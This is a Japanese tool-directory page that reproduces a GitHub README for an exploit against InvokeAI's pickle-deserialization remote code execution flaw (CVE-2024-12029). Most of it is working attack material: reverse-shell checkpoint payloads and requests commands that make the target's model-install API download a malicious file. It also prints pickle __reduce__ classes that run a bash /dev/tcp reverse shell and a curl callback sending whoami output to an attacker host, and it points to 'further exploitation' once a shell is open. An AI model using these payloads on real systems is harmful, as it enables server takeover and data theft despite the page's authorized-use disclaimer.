Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — このリポジトリには、SSHキー注入が失敗した場合のInvokeAI RCE脆弱性(CVE-2024-12029)の代替ペイロードアプローチが含まれています。ペイロードは、pickle逆シリアル化が実際に発生しているかどうかをテストし、代替アクセス方法を提供するように設計されています。 | Kitploit
ツール/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール学習と教育リモートアクセスツールペイロード開発
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

このリポジトリには、SSHキー注入が失敗した場合のInvokeAI RCE脆弱性(CVE-2024-12029)の代替ペイロードアプローチが含まれています。ペイロードは、pickle逆シリアル化が実際に発生しているかどうかをテストし、代替アクセス方法を提供するように設計されています。

リポジトリを見る
34ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

代替アプローチ:リバースシェル&コールバックテスト

概要

このリポジトリには、InvokeAIのRCE脆弱性(CVE-2024-12029)に対して、SSHキーインジェクションが失敗した場合の代替ペイロードアプローチが含まれています。ペイロードは、pickle逆シリアル化が実際に行われているかどうかをテストし、代替アクセス方法を提供するように設計されています。

問題の説明

SSHキーインジェクションペイロードが正常に配信された(ステータス201)にもかかわらず、SSHアクセスに依然としてパスワードが必要な場合、次のいずれかを示しています。

  1. pickle逆シリアル化が行われていない
  2. コマンドがブロック/サンドボックス化されている
  3. 実行方法に互換性がない

解決策:代替ペイロード

📁 ペイロードファイル

リバースシェルペイロード

  • payload_reverse_bash.ckpt (89バイト) - Bashリバースシェル
  • payload_reverse_python.ckpt (267バイト) - Pythonリバースシェル
  • payload_reverse_nc.ckpt (70バイト) - Netcatリバースシェル
  • テスト&検証ペイロード

    • payload_callback_test.ckpt (115バイト) - 逆シリアル化を検証するHTTPコールバック
    • payload_test.ckpt (90バイト) - 簡易ファイル作成テスト
    • payload_alt_exec.ckpt (223バイト) - 代替実行方法

    SSHペイロード(参考用)

    • payload_ssh_simple.ckpt (271バイト) - Linux互換のSSHキーインジェクション

    🛠️ テストスクリプト

    Kaliテストスクリプト

    • kali_reverse_test.py - 包括的なテストスイート

    ペイロードジェネレーター

    • reverse_shell_payload.py - リバースシェルペイロードの生成

    🚀 クイック使用方法

    1. ペイロードサーバーの起動

    root@kitploit:~
    python web_server.py --port 8000
    

    2. コールバックテスト(最初に推奨)

    root@kitploit:~
    # kali_reverse_test.pyをKaliにコピーして実行:
    python3 kali_reverse_test.py
    # オプション1を選択してコールバックをテスト
    

    3. リバースシェルのテスト

    root@kitploit:~
    # Kaliでリスナーを起動:
    nc -lvnp 4444
    
    # リバースシェルペイロードを送信:
    python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"
    

    4. 簡易実行のテスト

    root@kitploit:~
    # 基本コマンド実行のテスト:
    python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"
    
    # ファイル作成の確認:
    ssh [email protected] 'cat /tmp/payload_test.txt'
    

    📊 テスト結果の解釈

    ✅ コールバックテスト成功

    • 意味: pickle逆シリアル化が機能している
    • 次のステップ: リバースシェルまたは代替SSHペイロードを試す
    • 確認: HTTPコールバックのWebサーバーログ

    ✅ リバースシェル成功

    • 意味: コマンドが実行され、ネットワークアクセスが機能している
    • 結果: netcatリスナーを介した直接シェルアクセス
    • 次のステップ: リバースシェルを使用したさらなるエクスプロイト

    ✅ テストファイル作成

    • 意味: 基本コマンド実行が機能している
    • 次のステップ: 代替SSHインジェクション方法を試す
    • 確認: 対象マシンの/tmp/payload_test.txt

    コールバックペイロード

    root@kitploit:~
    class CallbackTestPayload:
        def __reduce__(self):
            import os
            command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
            return (os.system, (command,))
    

    リバースシェルペイロード

    root@kitploit:~
    class ReverseShellPayload:
        def __reduce__(self):
            import os
            command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
            return (os.system, (command,))
    

    テストペイロード

    root@kitploit:~
    class TestPayload:
        def __reduce__(self):
            import os
            return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))
    

    📚 参考文献

    • CVE-2024-12029: InvokeAI リモートコード実行
    • PyTorch 安全でない逆シリアル化: torch.load() の脆弱性
    • Pickle reduce: Pythonオブジェクトのシリアル化を利用したエクスプロイト

    ⚠️ 免責事項

    このリポジトリは教育目的および許可されたセキュリティテスト目的でのみ使用されます。ユーザーは、システムをテストする前に適切な許可を得ていることを確認する責任を負います。

    ツールをダウンロード